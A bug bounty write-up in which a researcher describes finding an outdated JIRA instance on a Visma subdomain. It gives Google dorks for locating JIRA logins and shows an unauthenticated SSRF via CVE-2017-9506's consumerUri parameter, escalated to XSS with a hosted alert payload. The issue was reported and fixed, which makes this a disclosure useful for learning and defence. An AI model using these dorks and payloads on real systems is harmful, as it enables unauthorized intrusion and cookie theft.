How Outdated JIRA Instances suffers from multiple security vulnerabilities?
Hello friends. This is Yeasir Arafat again here. In this article, I want to share what can we do with if a site is running third-party integration like jira.
I was testing a public bug bounty program called visma. As usual, I do the recon process to collect some subdomain of its. Few of its subdomains caught my attention which was running jira services. Example,
If you are particularly looking for jira subdomains of your targets you can use this kinda dorks.
inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login
I noticed that the domain https://jira.visma.lv has the JIRA version 6.2.7. I remember a CVE-2017–9506 for the Jira versions < 7.3.5. From the later version of jira, we can perform an Unauthenticated SSRF (CVE-2017–9506).
Loading external site as an Unauthenticated SSRF on https://jira.visma.lv.
I have tried to extract some data to the internal assets or getting read access but I am unable to do that. For the exploitation, you can use a tools name `Jira-Scan` available in Github.
You can create a simple HTML file which means to add XSS script. By running the file onto the consumerUri=http://yoursite.com/xsshostedfile you can trigger the XSS.
<title>SSRF to XSS on Jira Vulnerable Instances</title>
alert( document.domain + " is vulnerable" );
Turning into XSS by adding an HTML file. It also increases the severity of the vulnerability.
I know that only loading external site is p4 severity bugs. Hopefully, I am able to turn this SSRF into XSS. The attacker can now steal the victim cookies.
After sending a clean report about this vulnerability to the visma they fixed the issue between few hours. They told me that they will decommission other sub-domains which suffer from this same vulnerability.
- Yeasir Arafat